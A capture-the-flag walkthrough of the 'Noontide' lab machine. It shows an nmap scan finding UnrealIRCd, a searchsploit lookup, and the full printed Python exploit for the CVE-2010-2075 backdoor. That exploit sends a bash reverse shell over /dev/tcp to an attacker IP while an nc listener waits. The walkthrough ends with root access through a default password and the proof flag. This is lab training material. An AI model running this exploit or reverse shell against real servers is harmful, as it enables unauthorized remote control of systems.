Noontide

Port recognition withnmap

┌──(root@ghost)-[/home/ghost]
└─# nmap noontide.vuln -v -sV -p- --open --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-03 11:26 EDT
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 11:26
Scanning noontide.vuln (10.0.2.32) [1 port]
Completed ARP Ping Scan at 11:26, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:26
Scanning noontide.vuln (10.0.2.32) [65535 ports]
Discovered open port 6697/tcp on 10.0.2.32
Discovered open port 8067/tcp on 10.0.2.32
Discovered open port 6667/tcp on 10.0.2.32
Completed SYN Stealth Scan at 11:26, 1.43s elapsed (65535 total ports)
Initiating Service scan at 11:26
Scanning 3 services on noontide.vuln (10.0.2.32)
Completed Service scan at 11:26, 1.00s elapsed (3 services on 1 host)
NSE: Script scanning 10.0.2.32.
Initiating NSE at 11:26
Completed NSE at 11:26, 0.01s elapsed
Initiating NSE at 11:26
Completed NSE at 11:26, 0.00s elapsed
Nmap scan report for noontide.vuln (10.0.2.32)
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
MAC Address: 08:00:27:57:8A:66 (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.foonet.com

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.77 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

nmap scan report three open ports, seems that all ports are irc services

┌──(root@ghost)-[/home/ghost]
└─# searchsploit UnrealIRCd
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                                                                     | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                                                                          | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                                                                   | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                                                                        | windows/dos/27407.pl
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root@ghost)-[/home/ghost]
└─# wget https://raw.githubusercontent.com/0bfxgh0st/cve-2010-2075/main/cve-2010-2075.py
--2022-10-03 11:33:18--  https://raw.githubusercontent.com/0bfxgh0st/cve-2010-2075/main/cve-2010-2075.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 852 [text/plain]
Saving to: ‘cve-2010-2075.py’

cve-2010-2075.py                                 100%[=========================================================================================================>]     852  --.-KB/s    in 0s      

2022-10-03 11:33:19 (117 MB/s) - ‘cve-2010-2075.py’ saved [852/852]

┌──(root@ghost)-[/home/ghost]
└─# cat cve-2010-2075.py
#!/bin/usr/python3

# CVE-2010-2075 UnrealIrcd 3.2.8.1 exploit rebuild by 0bfxgh0st*

import socket, sys, os, threading

def help():

        print ("CVE-2010-2075")
        print ("UnrealIrcd 3.2.8.1 exploit")
        print ("Usage python3 cve-2010-2075.py <attackerip> <attackerport> <ircserverip> <ircserverport>")

try:

        attacker_ip=sys.argv[1]
        attacker_port=sys.argv[2]
        irc_ip=sys.argv[3]
        irc_port=sys.argv[4]
        p = 'AB;bash -c "bash -i >& /dev/tcp/' + attacker_ip + '/' + attacker_port + ' 0>&1;"'
        ep = bytes(p, 'utf-8')

except:

        help()
        sys.exit()

def exploit():

        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((irc_ip,int(irc_port)))
                s.sendall(ep)
                data = s.recv(1024)
                print(data.decode('utf-8'))

def nc():

        print ("Exploiting...")
        os.system('nc -lvp ' + attacker_port)

c = threading.Thread(target=nc)
c.start()
exploit()

┌──(root@ghost)-[/home/ghost]
└─# python3 cve-2010-2075.py
CVE-2010-2075
UnrealIrcd 3.2.8.1 exploit
Usage python3 cve-2010-2075.py <attackerip> <attackerport> <ircserverip> <ircserverport>

┌──(root@ghost)-[/home/ghost]
└─# python3 cve-2010-2075.py 10.0.2.15 1337 noontide.vuln 6667
Exploiting...
listening on [any] 1337 ...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...

connect to [10.0.2.15] from noontide.vuln [10.0.2.32] 41694
bash: cannot set terminal process group (370): Inappropriate ioctl for device
bash: no job control in this shell
server@noontide:~/irc/Unreal3.2$ su root
su root
Password: root
whoami
root
cat /root/proof.txt
ab28c8ca8da1b9ffc2d702ac54221105

Thanks for playing! - Felipe Winsnes (@whitecr0wz)